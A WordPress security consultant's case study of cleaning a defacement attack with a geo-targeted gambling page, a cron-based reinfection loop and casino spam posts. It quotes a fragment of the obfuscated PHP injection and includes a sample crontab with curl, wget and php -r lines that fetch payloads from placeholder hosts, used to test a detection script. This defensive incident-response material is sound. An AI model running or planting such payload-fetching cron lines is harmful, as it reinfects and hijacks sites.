WordPress Homepage Replaced With a Gambling Site? Inside a Real Defacement Attack With 53,771 Infected Files (Case Study)
If you’ve opened your WordPress website and instead of your real homepage you’re seeing a gambling site, casino interface, “Hacked by [name]” message, or any other content you didn’t put there — your site has been defaced. Homepage defacement is one of the most damaging WordPress hacks because every visitor, every customer, every Google Ad click lands on the attacker’s content instead of your business. The fix isn’t deleting the visible fake page — that almost never works because the malware regenerates from a hidden persistence mechanism (typically a cron job, a backdoor PHP file, or thousands of injected files scattered across the hosting account). The real cleanup requires identifying the persistence layer, removing it, then restoring the legitimate homepage and hardening every entry point the attacker used.
Quick Answer: WordPress homepage replaced with a gambling site or “hacked by” message
- What it is: a defacement attack — your real homepage has been replaced or hijacked, often via modified index.php, fake plugins, or geo-targeted redirects
- Why deleting the visible page doesn’t work: the malware regenerates from cron jobs, backdoor PHP files, or thousands of injection points across the account
- Why your scanner misses it: defacement malware often uses geo-targeting (only specific countries see the fake page), so the owner’s connection sees a normal site
- How to actually fix it: identify the defacement type, find the persistence mechanism (cron jobs, scattered backdoor files, or database injection), remove every layer, restore the legitimate homepage, and close the entry point
- What you must not skip: hosting account-wide audits — these attacks routinely scatter thousands of marker files across folders the owner never checks
A specific kind of email arrives in my inbox more often than any other type of WordPress security crisis: “I just opened my own website and it’s showing a gambling site.” Sometimes it’s “Hacked by [hacker name]” splashed across a black background. Sometimes it’s a fake casino interface with slot machines and aggressive call-to-action buttons. Sometimes the homepage looks completely normal to the owner but customers keep reporting they see something else entirely.
This is WordPress homepage defacement, and it’s one of the most damaging attacks a business website can suffer. Visitors can’t reach your real content. Google Ads campaigns burn budget driving traffic to the attacker’s page. Customers lose trust in the brand. Search engines may flag the domain. Every minute the defacement is live costs measurable money.
This case study walks through how I cleaned a real defacement attack that combined three of the most aggressive techniques I’ve seen in the same incident: 53,771 infected files, a geo-targeted fake gambling page, 12,000+ injected casino spam posts, and a cron job that regenerated the entire infection after each cleanup attempt. By the end you’ll know what to look for, how to diagnose which defacement variant you’re dealing with, and what the cleanup actually requires — because the visible fake page is almost never the whole story.
If your WordPress site has been defaced and you need urgent help, my WordPress malware removal service handles exactly this kind of incident.

What WordPress Homepage Defacement Actually Means
“Defacement” is the security industry term for any attack where the legitimate website content is replaced or hijacked with attacker-controlled content. On WordPress, it shows up in five recognizable patterns:
- “Hacked by [name]” defacement. The classic — homepage replaced with a black page, hacker signature, sometimes political or trolling messages. Often comes with thousands of identical signature files scattered across the account.
- Gambling/casino site replacement. Your homepage is replaced with a fake casino interface, slot machine page, or sportsbook landing. This is currently the most common variant I see — gambling spam exploded in volume after 2023.
- Geo-targeted defacement. The fake page loads only for visitors from specific countries. The owner viewing from their own location sees a normal site; visitors elsewhere see the hack. This is particularly destructive because it stays invisible to whoever can fix it.
- Search-engine defacement. Google indexes thousands of fake spam pages on your domain (Japanese keywords, pharma terms, casino spam). Visitors arriving directly see your real site, but search visibility is destroyed.
- Wholesale page replacement. Legitimate posts and pages are replaced with attacker content rather than supplemented. A real article becomes a casino landing page that keeps the same URL.
The case in this study combined elements of types 2, 3, and 4 into a single coordinated attack — making it a useful map of how serious defacement campaigns actually operate.
The Client’s Situation: Three Days From Disaster to Cleanup
The business was running paid Google Ads campaigns. For roughly 6 to 8 hours, every visitor clicking those ads was landing on a fake JAKARTASLOT88 gambling page instead of the real business website. Ad spend was being burned. Customer trust was eroding. The brand was being publicly associated with online gambling.
When I got access, the scope of the compromise was shocking even by defacement standards:
- The visible homepage was serving a complete gambling interface with slot machine graphics
- The malware was checking visitor geolocation and only showing the fake page to specific countries (Indonesia and the United States, in this case)
- An initial server scan flagged 53,771 infected files across the hosting account
- Thousands of .txt defacement files were scattered across cPanel directories with the signature Hacked by L4663r6666h05t x Single Attacker
- The WordPress database had been polluted with spam content as well
- Even after standard file-level cleanup attempts, the malware regenerated
This was not a single-file fix. It was an account-wide compromise with multiple persistence mechanisms running in parallel. Cleanups that succeed on attacks like this share one quality: they treat the visible defacement as a symptom, not the disease.

How the Defacement Was Actually Working
Three coordinated mechanisms made this attack survive normal cleanup attempts:
Mechanism 1: Geo-Targeted PHP Injection in index.php
The core payload was hidden inside the WordPress index.php file using heavily obfuscated PHP. Once decoded, the logic was straightforward: the malware harvested the visitor’s IP, looked it up via ip-api.com, and only served the fake gambling page to visitors from selected countries. To everyone else, the site loaded normally.
Here’s what the obfuscated injection looked like in the file:
goto P1kOa; E5FKM: $nZuEo = puO1P(); goto yc4Bj;
ee0Ow: $CfnXq = file_get_contents($kES4i); goto FBVGD;
q2wU5: if (!($zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x49\x44"
|| $zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x55\x53"))
{ goto eqXVk; } goto h37vR;
iV6IJ: include "\x69\x6e\x64\x65\x78\x2d\x31\x2e\x68\x74\x6d\x6c"; goto ewSKG;
The hex-encoded strings reveal the intent:
- countryCode — the malware was checking visitor country
- ID/US — Indonesia and the United States were specifically targeted
- index-1.html — the fake gambling page was loaded from a local HTML file deployed alongside index.php
This is what made the attack so hard to diagnose. The site owner viewing from their own location (likely outside ID and US) saw a normal-looking homepage. Customers and Google Ads visitors from the targeted geographies saw the hijacked gambling page. The infection was effectively invisible to whoever had the authority to fix it.
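The decoding step described above can be automated during triage. This is an added example, not code from the original post: it decodes the hex and octal escapes in PHP double-quoted strings, using the excerpt quoted above as input; the function names and report fields are illustrative choices.

```python
import re

# Excerpt of the injected code quoted above; only its string literals matter here.
SAMPLE = r'''
q2wU5: if (!($zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x49\x44"
|| $zPV0B["\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65"] === "\x55\x53"))
{ goto eqXVk; } goto h37vR;
iV6IJ: include "\x69\x6e\x64\x65\x78\x2d\x31\x2e\x68\x74\x6d\x6c"; goto ewSKG;
'''

# A PHP double-quoted literal: everything up to the first unescaped closing quote.
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# \xHH (1-2 hex digits), \NNN (1-3 octal digits), or any other backslash pair.
ESCAPE = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(.))', re.S)
GOTO = re.compile(r'\bgoto\s+\w+\s*;')


def decode_php_escapes(body):
    """Decode numeric escapes the way PHP does; leave other escapes untouched."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above \377
        return m.group(0)  # e.g. \\ or \n: not part of the obfuscation
    return ESCAPE.sub(repl, body)


def has_numeric_escape(body):
    return any(m.group(1) is not None or m.group(2) is not None
               for m in ESCAPE.finditer(body))


def decoded_literals(php_source):
    """Decoded text of every escape-encoded literal, in order, without repeats."""
    seen = []
    for m in DQ_STRING.finditer(php_source):
        if has_numeric_escape(m.group(1)):
            text = decode_php_escapes(m.group(1))
            if text not in seen:
                seen.append(text)
    return seen


def triage(php_source):
    """Summarise the traits this case showed: goto spaghetti, geo check, HTML include."""
    literals = decoded_literals(php_source)
    return {
        "decoded": literals,
        "goto_count": len(GOTO.findall(php_source)),
        "geo_check": "countryCode" in literals,
        "html_literals": [s for s in literals if s.lower().endswith((".html", ".htm"))],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A clean WordPress index.php contains no escape-encoded literals and no goto statements, so any non-empty result on that file is worth a manual look.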
For broader coverage of how attackers use cloaking and geo-targeting, see WordPress cloaking malware removal case study and why a website shows the wrong content after malware infection.
Mechanism 2: Defacement Marker Files Across the Entire Account
Working through the hosting account, I found thousands of seemingly harmless .txt files scattered across cPanel — including in directories that had nothing to do with WordPress. Each one contained the same defacement message: Hacked by L4663r6666h05t x Single Attacker.
These files weren’t directly powering the visible gambling page. But they told me two critical things:
- The attacker had write access to a very large portion of the hosting environment, not just the WordPress installation
- The infection was not isolated to one plugin or one theme — it had touched the entire account
That instantly changed the cleanup scope. This wasn’t a “fix the WordPress site” problem. It was an “audit the entire hosting account” problem, with strong signs of mass tampering and likely persistence in places I hadn’t found yet.

Mechanism 3: A cPanel Cron Job Regenerating the Infection
This is the persistence mechanism that traps most DIY cleanup attempts on defacement attacks. Even after I cleaned the file-level malware, replaced infected core files, removed the geo-targeted index.php injection, and ran the standard WordPress hardening sequence — the malware came back.
That’s the fingerprint of cron-based persistence. Standard malware scanners check files. They check the database. Most of them never check the hosting account’s scheduled task list. Attackers know this and routinely plant cron jobs that:
- Run every few minutes
- Re-download the malicious payload from an attacker-controlled server
- Re-inject the obfuscated PHP into index.php
- Recreate the defacement marker files
- Re-add hidden admin users to the WordPress database
When malware reappears within hours of cleanup, treat it as cron persistence until proven otherwise. I documented the cron-loop pattern in detail in why WordPress malware keeps coming back and how to stop it forever — that’s the companion piece to this case study.
I logged into the cPanel cron interface and found a recurring task running a script that triggered exactly the regeneration behavior. Removing it was the turning point of the entire cleanup. Until that cron task was gone, every visible cleanup was temporary.
The Companion Attack: 12,000 Casino Spam Posts
While the visible defacement was the urgent crisis, a second attack vector was running in parallel on this site (and on a separate Polylang-based multilingual site I worked on with similar characteristics): thousands of casino and gambling posts injected directly into the WordPress database.
This is the SEO-poisoning side of defacement campaigns. While the homepage hijack steals current traffic, the injected spam posts steal future traffic by polluting the domain’s search index. On the multilingual site I cleaned in a related case, more than 12,000 spam posts had been injected — enough to push the legitimate content out of Google’s indexed results and break the site’s Polylang language switching.

The pattern in both cases was identical:
- Spam posts injected directly into wp_posts with gambling-related titles and content
- Associated wp_postmeta entries created to make them appear as legitimate posts
- SEO-friendly URLs designed to rank for casino, slot, and gambling search terms
- Often using the site’s existing authority to push the spam content into Google’s index
For owners of sites hit with similar large-scale spam injections, see also how I removed 10,500 SEO spam URLs from Google in 12 days and cleaning a WordPress site from 3.45 million Matbet SEO spam URLs.
The Cleanup, Phase by Phase
Cleanups at this scale require strict ordering. Skipping steps is how cleanups fail and have to be redone three or four times before they hold.
Phase 1: Containment (Don’t Touch Anything Yet)
Before removing a single file, I:
- Enabled maintenance mode so visitors saw a placeholder while cleanup ran
- Took a complete backup snapshot of the site files and database — even though the site was infected, this preserves evidence
- Saved samples of the defacement files, the obfuscated index.php injection, and the malicious cron job for forensic reference
- Documented the visible behavior and confirmed the geo-targeted scope
Speed-of-cleanup matters less than thoroughness on incidents this size. Rushing past containment means losing evidence you might need later.
Phase 2: Surgical Removal of the Visible Defacement
With evidence preserved, I started with the file-level cleanup. The defacement marker files were the easiest target — bulk removal via SSH:
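# NUL-delimited output so filenames containing spaces or newlines are deleted safely
find /home/client/public_html -type f -name '*.txt' \
  -exec grep -qF 'Hacked by L4663r6666h05t' {} \; -print0 | xargs -0 rm -f --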
Then I worked through:
- Replacing the compromised index.php with a clean WordPress version
- Replacing all WordPress core files with verified clean originals from WordPress.org
- Removing the local index-1.html file that contained the gambling interface
- Auditing every theme and plugin file for additional obfuscated injections
- Checking the database for malicious entries in wp_options and wp_postmeta
- Verifying that the visible gambling content was no longer being served from any country
For approaches to mass file cleanup at this scale, see how I cleaned 12,718 malware-infected PHP files in 5 minutes using VS Code.
Phase 3: Remove the Persistence Mechanisms
This is where most DIY defacement cleanups fail. The site looked clean after Phase 2 — but the malware came back within hours during my testing window. That confirmed cron-based persistence.
I logged into cPanel’s cron job interface and reviewed every scheduled task on the account. The malicious entry was disguised as a routine maintenance task with an innocuous-sounding name, but it was scheduled to run every few minutes and was calling out to an attacker-controlled server. I removed the cron job, then re-ran the file cleanup to remove anything it had regenerated during the testing window.
After cron removal, I also audited:
- Hidden admin users in wp_users (the cron job had created several backup accounts) — see how to find and remove hidden admin users
- Database injections in wp_options that could re-trigger infection
- Backdoor PHP files outside the WordPress directory (the cron job had been calling one of these)
- WordPress security keys (rotated to invalidate any active attacker sessions)

Phase 4: Database Cleanup of Spam Content
For the related multilingual site with 12,000+ injected casino posts, this phase was the largest by volume. WordPress’s bulk-edit tools timed out on this many records, so the cleanup ran via direct database queries to delete spam posts and their associated metadata atomically — preserving legitimate content while purging gambling spam.
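A sketch of the review-then-delete pattern this phase describes, as an added example rather than the queries used in this cleanup. Python's sqlite3 stands in for the site's MySQL database; the rows are constructed and the keyword list is an assumption to be tuned per incident.

```python
import sqlite3

# Assumption: title keywords chosen for this demo; tune them per incident.
SPAM_TERMS = ("casino", "slot", "jackpot")


def build_demo_db():
    """In-memory stand-in for wp_posts / wp_postmeta with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT,
                               post_type TEXT, post_status TEXT);
        CREATE TABLE wp_postmeta (meta_id INTEGER PRIMARY KEY, post_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    db.executemany("INSERT INTO wp_posts VALUES (?,?,?,?)", [
        (1, "About our clinic", "page", "publish"),
        (2, "Book an appointment slot online", "post", "publish"),  # legitimate
        (3, "Best online casino bonus 2024", "post", "publish"),
        (4, "Slot jackpot tonight", "post", "publish"),
        (5, "Opening hours over the holidays", "post", "publish"),
    ])
    db.executemany(
        "INSERT INTO wp_postmeta (post_id, meta_key, meta_value) VALUES (?,?,?)",
        [(pid, "_edit_last", "1") for pid in (1, 2, 3, 3, 4, 5)])
    db.commit()
    return db


def find_spam_candidates(db, terms):
    """Return (ID, title) pairs for review. Keyword hits are candidates, not verdicts."""
    where = " OR ".join("LOWER(post_title) LIKE ?" for _ in terms)
    sql = ("SELECT ID, post_title FROM wp_posts "
           f"WHERE post_type = 'post' AND ({where}) ORDER BY ID")
    return db.execute(sql, [f"%{t.lower()}%" for t in terms]).fetchall()


def purge_posts(db, ids, batch=500):
    """Delete reviewed posts and their metadata in a single transaction.

    Batching keeps each statement small; any mismatch between the reviewed
    IDs and the rows actually deleted rolls the whole purge back.
    """
    ids = sorted(set(ids))
    deleted = 0
    with db:  # commits on success, rolls back if an exception escapes
        for i in range(0, len(ids), batch):
            chunk = ids[i:i + batch]
            marks = ",".join("?" * len(chunk))
            db.execute(f"DELETE FROM wp_postmeta WHERE post_id IN ({marks})", chunk)
            deleted += db.execute(
                f"DELETE FROM wp_posts WHERE ID IN ({marks})", chunk).rowcount
        if deleted != len(ids):
            raise RuntimeError(f"expected {len(ids)} deletions, got {deleted}")
    return deleted


if __name__ == "__main__":
    db = build_demo_db()
    candidates = find_spam_candidates(db, SPAM_TERMS)
    print("candidates:", candidates)
    reviewed = [pid for pid, _ in candidates if pid != 2]  # post 2 is real content
    print("deleted:", purge_posts(db, reviewed))
```

The constructed post 2 shows why the candidate list is reviewed before anything is deleted: a keyword match on "slot" alone would have removed legitimate content.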
For broader database malware cleanup, see how to scan and clean your WordPress database for hidden malware.
Phase 5: Restore the Real Homepage
With all defacement layers removed, the WordPress site rendered the legitimate homepage again. I verified by:
- Loading the site from multiple geographic locations using VPN to confirm the geo-targeting was no longer active
- Testing through different user agents (mobile, desktop, search engine bot) to rule out conditional injections I might have missed
- Running a fresh malware scan against the cleaned environment
- Confirming that ad-targeted landing pages loaded correctly for the campaign’s intended audiences

Phase 6: Hardening (So It Doesn’t Come Back)
The final and most important phase. The defacement happened because something in the original environment let an attacker in. Without closing that gap, the cleanup is just a reset before the next compromise.
- Updated WordPress core, all plugins, and the active theme to current versions
- Removed inactive plugins and abandoned themes that increased the attack surface
- Replaced any nulled/pirated software with legitimate copies — see why nulled plugins are a security disaster
- Rotated every credential — WordPress admin, hosting cPanel, FTP/SFTP, database user
- Enabled two-factor authentication on WordPress and cPanel
- Set up off-site backups (in-site backups can be deleted along with everything else in destructive attacks)
- Configured file integrity monitoring with alerts on changes to index.php and other critical files
- Installed a Web Application Firewall
- Reviewed and audited cPanel cron jobs as part of standard security checks (this is now part of every monthly review for the client)
For the complete post-cleanup checklist, see what to do after fixing a hacked WordPress site.
Results
- ✅ Real homepage restored within ~90 minutes of starting the active cleanup
- ✅ All 53,771 infected files cleaned or replaced
- ✅ Defacement marker files removed from across the entire hosting account
- ✅ Geo-targeted index.php injection removed
- ✅ Malicious cPanel cron job removed (the persistence mechanism that was breaking earlier cleanup attempts)
- ✅ 12,000+ casino/gambling spam posts removed from the related multilingual site cleanup
- ✅ Polylang multilingual functionality restored on that companion case
- ✅ Hidden admin users removed
- ✅ Site verified clean from multiple geographic locations
- ✅ Google Ads traffic returned to landing on legitimate pages
- ✅ Site hardened with 2FA, WAF, off-site backups, file integrity monitoring
The total active cleanup window was about half a day for the file-and-cron work, with the database spam cleanup on the related multilingual site taking longer due to volume. The fastest meaningful win came from removing the cron job — once that was gone, every subsequent cleanup step actually held.
What Site Owners Should Take Away
If you’re reading this because your homepage has been defaced, these are the patterns from this cleanup that apply to almost every defacement case:
- The visible fake page is rarely the whole infection. The marker files, cron jobs, backdoor PHP, and database injections are usually all running in parallel. Cleaning only the visible page sets up reinfection within hours.
- If the malware comes back after cleanup, look for cron jobs first. This is the most commonly missed persistence mechanism in defacement attacks. Standard malware scanners don’t check cPanel scheduled tasks.
- Geo-targeting makes diagnosis harder. If your site looks fine to you but customers report it’s broken, test from a VPN in different countries. The defacement may only be visible to specific geographies.
- Account-wide audits matter. Defacement attacks routinely scatter marker files into directories that have nothing to do with WordPress. Limit your cleanup to public_html and you’ll miss artifacts in subdomains, mail directories, and old folders.
- Speed matters financially. Every hour your homepage is replaced costs ad spend, customer trust, and SEO authority. Defacement is the single most expensive attack class per hour of downtime.
- The casino/gambling variant has exploded since 2023. If your site has been hit with gambling content (homepage replacement, post injection, or both), you’re part of a much larger campaign. The technical patterns are now well-documented and predictable to professional cleaners.
FAQ
Why is my WordPress homepage suddenly showing a gambling site?
Your site has been defaced — an attacker has replaced or hijacked your real homepage with their own content, almost always to monetize through fake gambling traffic. The replacement is typically done by injecting code into your WordPress index.php file, deploying a fake HTML page alongside it, and using geo-targeting so the fake content shows for visitors from specific countries. Your scanner may not detect it because the injection is heavily obfuscated and the fake page may not show on your own connection.
I deleted the fake gambling page and the next day it came back. Why?
Because the visible page wasn’t the source of the infection — it was being regenerated by a hidden persistence mechanism. The most common cause on these attacks is a malicious cPanel cron job running every few minutes that re-creates the infection from a remote payload. Other causes include backdoor PHP files in the uploads folder, hidden admin users in the WordPress database, and modified core files outside the obvious infection points. Until you find and remove the persistence layer, the defacement will keep returning.
How do I check my cPanel cron jobs for malicious entries?
Log into cPanel and navigate to Advanced → Cron Jobs. Review every scheduled task. Be suspicious of anything you don’t remember setting up, especially if the command involves curl, wget, php -r, or calls to unfamiliar URLs. Anything running at very short intervals (every minute, every 5 minutes) on a small business site is also worth investigating. Document any entries before deleting them — the URLs they call may help identify other infected sites the same attacker hit.
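The review described in this answer, and in the Mechanism 3 section earlier, can be scripted against exported crontab text. This is an added example, not tooling from the original case: the sample crontab is constructed, its hosts are placeholders, and the reason labels and the 12-runs-per-hour threshold (every 5 minutes or more often) are assumptions drawn from the guidance above.

```python
import re

# Constructed sample of `crontab -l` output; hosts use the reserved .invalid TLD.
SAMPLE_CRONTAB = '''\
MAILTO=""
# nightly database backup
30 2 * * * /usr/local/bin/backup.sh
*/3 * * * * curl -s http://updates.example.invalid/a.txt -o /home/client/.cache/sys.php
* * * * * php -r 'include "/home/client/.cache/sys.php";'
0 */6 * * * /usr/bin/php /home/client/public_html/wp-cron.php
@reboot wget -q http://cdn.example.invalid/x -O /home/client/.cache/x
'''

ENV_LINE = re.compile(r'^[A-Za-z_]\w*\s*=')
FETCH = re.compile(r'\b(?:curl|wget)\b')
INLINE_PHP = re.compile(r'(?:^|[\s/])php[\d.]*\s+-r\b')
URL = re.compile(r'https?://[^\s\'"]+')


def minute_hits(field):
    """Expand a cron minute field (lists, ranges, steps) to the minutes it fires on."""
    hits = set()
    for part in field.split(","):
        rng, _, step = part.partition("/")
        if rng == "*":
            lo, hi = 0, 59
        elif "-" in rng:
            lo, hi = (int(x) for x in rng.split("-", 1))
        else:
            lo = hi = int(rng)
        hits.update(range(lo, hi + 1, int(step) if step else 1))
    return hits


def audit_crontab(text):
    """Return one finding per suspicious entry: line number, schedule, command, reasons, URLs."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # blank lines, comments and VAR=value settings run nothing
        reasons = []
        if line.startswith("@"):  # @reboot, @hourly, ...
            schedule, command = (line.split(None, 1) + [""])[:2]
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                schedule, command, reasons = "", line, ["unparseable"]
            else:
                schedule, command = " ".join(parts[:5]), parts[5]
                try:
                    # Hour field "*" plus 12+ firing minutes = every 5 minutes or less.
                    if parts[1] == "*" and len(minute_hits(parts[0])) >= 12:
                        reasons.append("short-interval")
                except ValueError:
                    reasons.append("unparseable")
        if FETCH.search(command):
            reasons.append("remote-fetch")
        if INLINE_PHP.search(command):
            reasons.append("inline-php")
        urls = URL.findall(command)
        if urls:
            reasons.append("url")
        if reasons:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "reasons": reasons, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['reasons'])} -> {f['command']}")
```

Feed it the output of crontab -l for each account user, and copy flagged lines and their URLs into the incident notes before removing anything.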
The site looks fine on my computer but customers say it’s hacked. What’s happening?
That’s geo-targeted defacement — the malicious code checks each visitor’s country (or other criteria like user agent or referrer) and only shows the fake page to specific groups. The owner viewing from their own location often falls outside the targeted set, so the site looks normal to them while customers, ad traffic, and search engine crawlers see something completely different. Test your site from a VPN with locations in different countries to verify.
Will my Google Ads account be penalized for sending traffic to a defaced page?
It can be. Google’s ad policies prohibit ads landing on hacked or malicious content. If Google detects that your ad destination is serving gambling, malware, or deceptive content, ads can be disapproved or the entire account can be suspended. The faster you clean the defacement and notify Google through Search Console, the lower the risk of advertising consequences. In the meantime, pause active campaigns until cleanup is verified.
Can a defaced website affect my Google search rankings?
Yes — significantly. Defacement often comes paired with mass spam content injection (the “12,000 casino posts” pattern) that floods your domain with low-quality content Google will eventually flag. Even without the spam injection, a homepage replacement that shows for Googlebot will be re-indexed as the new content, replacing your legitimate listings. Defaced sites also frequently end up on Google’s Safe Browsing blocklist, which causes “This site may be hacked” warnings in search results that destroy click-through rates. SEO recovery after defacement typically takes weeks to months even after the technical cleanup is complete.
How long does a defacement cleanup typically take?
For small-to-medium WordPress sites with the standard pattern (homepage replacement + cron job + a few thousand marker files), a thorough cleanup is usually 4–8 hours of focused work. For larger sites with database spam injection at the 10,000+ posts scale, the database cleanup phase alone can extend to a full day or more. The fastest meaningful result — getting the real homepage back online for visitors — typically takes 1–2 hours once the persistence mechanism is identified.
What’s the difference between defacement and a regular WordPress hack?
A regular WordPress hack often runs in the background — backdoors, redirect malware, SEO spam — while the visible site continues to function normally. Defacement specifically targets the visible content, replacing or hijacking what visitors see. Both are serious, but defacement causes faster business damage because it’s immediately visible to every customer. Most defacement attacks also include the regular hack components (backdoors, SEO spam, persistence mechanisms) underneath the visible defacement.
Should I just delete WordPress and reinstall after defacement?
Not without preserving the database first. The WordPress database holds your posts, pages, settings, and user accounts — none of that is in WordPress core files. A complete reinstall without database export will lose every piece of legitimate content. The correct approach is: export the clean parts of the database, set up a fresh WordPress installation, import the cleaned database into the new install, reinstall themes and plugins from clean sources, then verify everything works before going live. For the broader recovery process, see how to recover when WordPress files have been deleted.
Need Help With a Defaced WordPress Site?
Homepage defacement is one of the highest-stakes WordPress security incidents because every minute of damage compounds — lost ad spend, eroded customer trust, SEO penalties, brand association with gambling or hacker signatures. The longer it stays live, the more expensive the recovery becomes.
I’ve cleaned more than 4,500 hacked WordPress sites since 2018, including dozens of large-scale defacement attacks like the one in this case study. If your homepage is showing a gambling site, a “hacked by” message, or any content you didn’t put there, this is exactly the kind of incident I work on every week.
Get Expert WordPress Malware Removal — or contact me directly via the hire me page.